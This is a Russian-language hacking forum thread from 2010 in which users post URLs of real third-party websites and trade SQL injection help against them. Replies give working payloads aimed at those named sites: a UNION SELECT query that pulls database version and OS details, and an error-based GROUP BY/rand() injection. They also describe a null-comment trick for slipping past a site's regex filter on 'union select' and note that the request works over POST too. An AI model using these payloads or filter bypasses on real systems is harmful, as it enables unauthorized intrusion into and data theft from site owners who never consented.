
13.09.2010, 21:44
|
|
Новичок
Регистрация: 21.10.2009
Сообщений: 27
С нами:
8713408
Репутация:
16
|
|
Код:
http://www.koruna.ua/index.php?id=2'
А тут можеш мне помочь? Сайт уязвим вобше?
____
Сам вроде разобрался) Спасибо еще раз)
|
|
|

14.09.2010, 11:06
|
|
Новичок
Регистрация: 30.03.2010
Сообщений: 2
С нами:
8482939
Репутация:
0
|
|
http://powell.citymedia.ca/deal_framed.php?deal_id=64202
|
|
|

14.09.2010, 15:34
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
С нами:
8663103
Репутация:
0
|
|
Сообщение от gabarea
http://powell.citymedia.ca/deal_framed.php?deal_id=64202
http://powell.citymedia.ca/categorydetails.php?cat_id=-186'+union+select+1,@@version_compile_os,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22 ,23,24,25,26,27,28,29,30+--+
|
|
|

14.09.2010, 20:00
|
|
Новичок
Регистрация: 21.08.2010
Сообщений: 5
С нами:
8276726
Репутация:
0
|
|
что делать если union и select в связке фильтруются
|
|
|

14.09.2010, 20:38
|
|
Новичок
Регистрация: 30.03.2010
Сообщений: 2
С нами:
8482939
Репутация:
0
|
|
http://www.ftv.com/fashion/page.php?P=2803&gid=807&kid=11473&size=full&pid=53 965
|
|
|

14.09.2010, 21:05
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от gabarea
http://www.ftv.com/fashion/page.php?P=2803&gid=807&kid=11473&size=full&pid=53 965
а не пойти бы вам на все 3 буквы? тут что для вас....конвеер по раскрутке скулей для тебя?
|
|
|

14.09.2010, 21:33
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
С нами:
9509918
Репутация:
30
|
|
Kappa_87
http://www.xxx.ru/showtopic.php?num=-123 or 1 /*%00*/ group by concat(left((select count(*) from INFORMATION_SCHEMA.TABLES),64),rand(0)|0) having min(0)--+
=>
244
в принципе с /*%00*/ и обыкновенный union select скорее всего прокатит (лень и неинтересно уже дальше копать) - у них там некая хрень, похоже самописная, которая все параметры к сайту при любом обращении фильтрует по regexp на что-то в роде select.+from и union.+select c безразличеем к регистру.
кста, запрос и через post проходит
|
|
|

14.09.2010, 23:58
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
Заметил, что есть категория сайтов, у которых нет "подцепки" для неопытных..
ну скажем сайт крутой, серьезный и куда не переходи - все линки кончаются на *.htm , *.aspx или .html. А в особыйслучаях - без расширением, чисто по разделам: /home/, /photo/ и т.п.
В таких случаях как можно быть ? в концах попробывал сатвить ', 1=1 и т.п. дела, а по просто показывает, что нет такого страницы.
просто я обычно тренировался на т.п. запросах, как это: /*.php?id=***
а тут другая ситуация уже..
|
|
|

15.09.2010, 00:35
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от B1t.exe
Заметил, что есть категория сайтов, у которых нет "подцепки" для неопытных..
ну скажем сайт крутой, серьезный и куда не переходи - все линки кончаются на
*.htm
,
*.aspx
или
.html
. А в особыйслучаях - без расширением, чисто по разделам: /home/, /photo/ и т.п.
В таких случаях как можно быть ? в концах попробывал сатвить ', 1=1 и т.п. дела, а по просто показывает, что нет такого страницы.
просто я обычно тренировался на т.п. запросах, как это:
/*.php?id=***
а тут другая ситуация уже..
mod_rewrite тебе о чем нибудь говорит?
|
|
|

15.09.2010, 00:56
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами:
10268804
Репутация:
208
|
|
Gorev
ну да, недавно было тема об этом mod_rewrite , сказали, что тлько фаззингом можно раскрывать пути вроде.
а как насчет этих:
Сообщение от None
все линки кончаются на *.htm , *.aspx или .html.
это уж точно не mod_rewrite !
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|